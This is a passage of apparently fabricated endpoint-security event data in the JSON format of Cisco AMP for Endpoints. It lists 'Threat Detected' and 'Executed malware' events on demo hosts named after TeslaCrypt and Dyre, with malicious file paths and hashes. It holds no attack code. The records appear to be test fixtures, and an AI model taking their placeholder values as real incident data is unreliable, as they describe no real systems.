Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6533668885361590307","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Audit","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"63:5f:47:2b:89:91"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"ekjrngjker.exe","file_path":"C:\\ekjrngjker.exe","identity":{"sha256":"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967","sha1":"b024546a49bad1bd60fccef0a5d11b55f9a442c4","md5":"b99e0a8c56f963246b6464b9fffbf7a2"}}}} {"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176259135965757000,"timestamp":1610705870,"timestamp_nanoseconds":8000000,"date":"2021-01-15T10:17:50+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"GenericKD:Dyreza-tpd","detection_id":"6176259135965757532","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"webinstall.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc","sha1":"ec80314ae4a2817be806b7ae27dbdb31a88226a0","md5":"e9d8c15e7d18678dd41771f72ed6693c"}}}} {"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":1489955900291000600,"timestamp":1610705861,"timestamp_nanoseconds":291000000,"date":"2021-01-15T10:17:41+00:00","event_type":"Executed malware","event_type_id":1107296272,"detection":"W32.3372C1EDAB-100.SBX.TG","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","start_timestamp":1610705861,"start_date":"2021-01-15T10:17:41+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370"},"parent":{"disposition":"Clean","identity":{"sha256":"9e1ec8b43a88e68767fd8fed2f38e7984357b3f4186d0f907e62f8b6c9ff56ad"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251520740131000,"timestamp":1610705860,"timestamp_nanoseconds":3000000,"date":"2021-01-15T10:17:40+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6159251520740130915","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251516445164000,"timestamp":1610705859,"timestamp_nanoseconds":988000000,"date":"2021-01-15T10:17:39+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6159251516445163618","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251516445164000,"timestamp":1610705859,"timestamp_nanoseconds":988000000,"date":"2021-01-15T10:17:39+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6159251516445163617","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251516445164000,"timestamp":1610705859,"timestamp_nanoseconds":894000000,"date":"2021-01-15T10:17:39+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6159251516445163616","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251516445164000,"timestamp":1610705859,"timestamp_nanoseconds":894000000,"date":"2021-01-15T10:17:39+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6159251516445163615","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251516445164000,"timestamp":1610705859,"timestamp_nanoseconds":894000000,"date":"2021-01-15T10:17:39+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6159251516445163614","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251516445164000,"timestamp":1610705859,"timestamp_nanoseconds":878000000,"date":"2021-01-15T10:17:39+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6159251516445163613","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251516445164000,"timestamp":1610705859,"timestamp_nanoseconds":878000000,"date":"2021-01-15T10:17:39+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6159251516445163612","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251516445164000,"timestamp":1610705859,"timestamp_nanoseconds":863000000,"date":"2021-01-15T10:17:39+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6159251516445163611","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251516445164000,"timestamp":1610705859,"timestamp_nanoseconds":863000000,"date":"2021-01-15T10:17:39+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6159251516445163610","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251516445164000,"timestamp":1610705859,"timestamp_nanoseconds":816000000,"date":"2021-01-15T10:17:39+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6159251516445163609","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251516445164000,"timestamp":1610705859,"timestamp_nanoseconds":738000000,"date":"2021-01-15T10:17:39+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6159251516445163608","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251516445164000,"timestamp":1610705859,"timestamp_nanoseconds":722000000,"date":"2021-01-15T10:17:39+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6159251516445163607","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251516445164000,"timestamp":1610705859,"timestamp_nanoseconds":722000000,"date":"2021-01-15T10:17:39+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6159251516445163606","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251516445164000,"timestamp":1610705859,"timestamp_nanoseconds":691000000,"date":"2021-01-15T10:17:39+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6159251516445163605","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251516445164000,"timestamp":1610705859,"timestamp_nanoseconds":691000000,"date":"2021-01-15T10:17:39+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6159251516445163604","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251516445164000,"timestamp":1610705859,"timestamp_nanoseconds":644000000,"date":"2021-01-15T10:17:39+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6159251516445163603","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251516445164000,"timestamp":1610705859,"timestamp_nanoseconds":629000000,"date":"2021-01-15T10:17:39+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6159251516445163602","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} {"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251516445164000,"timestamp":1610705859,"timestamp_nanoseconds":613000000,"date":"2021-01-15T10:17:39+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6159251516445163601","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251516445164000,"timestamp":1610705859,"timestamp_nanoseconds":613000000,"date":"2021-01-15T10:17:39+00:00","event_type":"Threat 